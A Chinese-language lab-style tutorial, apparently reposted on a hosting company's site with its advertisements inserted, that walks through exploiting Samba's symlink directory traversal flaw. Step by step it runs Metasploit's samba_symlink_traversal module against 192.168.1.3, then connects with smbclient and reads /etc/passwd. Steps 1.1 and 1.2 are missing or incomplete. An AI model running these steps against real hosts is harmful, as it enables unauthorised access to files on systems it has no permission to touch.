Samba是一套實現SMB（server messages block）協議，跨平臺進行文件共享和打印共享服務的程序，samba的sambd默認配置在可寫文件共享時，存在目錄遍歷漏洞，遠程用戶可以通過smbclient端使用一個對稱命，創(chuàng)建一個包含..的目錄遍歷符的軟連接 ，可以進行目錄遍歷以及訪問任意文件。

成都創(chuàng)新互聯-專業(yè)網站定制、快速模板網站建設、高性價比肅北網站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式肅北網站制作公司更省心,省錢,快速模板網站建設找我們，業(yè)務覆蓋肅北地區(qū)。費用合理售后完善，十多年實體公司更值得信賴。

一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處，右鍵菜單選擇“在終端中打開”。

1.3在終端中輸入命令“msfconsole”，啟動MSF終端。

1.4在終端中輸入命令“search samba”，搜索samba的相關工具和***載荷。

1.5在終端中輸入命令“use auxiliary/admin/smb/samba_symlink_traversal”，啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。

1.6在終端中輸入命令“info”，查看需要設置的相關項，“yes”表示必須填寫的參數。

1.7在終端中輸入命令“set RHOST 192.168.1.3”，設置目標主機的IP地址。

1.8在終端中輸入“set SMBSHARE tmp”, 設置SAM可寫文件。

1.9在終端中輸入“exploit”, 開始***。

1.10新打開一個終端，輸入“smbclient //192.168.1.3/tmp”,直接回車，不用輸入密碼。

1.11在終端中輸入“cd rootfs”, 進入rootfs目錄,在終端下輸入命令“l(fā)s”,列出目錄。

1.12在終端中輸入“more /etc/passwd”, 查看目標主機系統中的密碼。

另外有需要云服務器可以了解下創(chuàng)新互聯scvps.cn，海內外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

名稱欄目：Metasploit溢出samba提權漏洞-創(chuàng)新互聯
轉載來于：http://weahome.cn/article/pcipi.html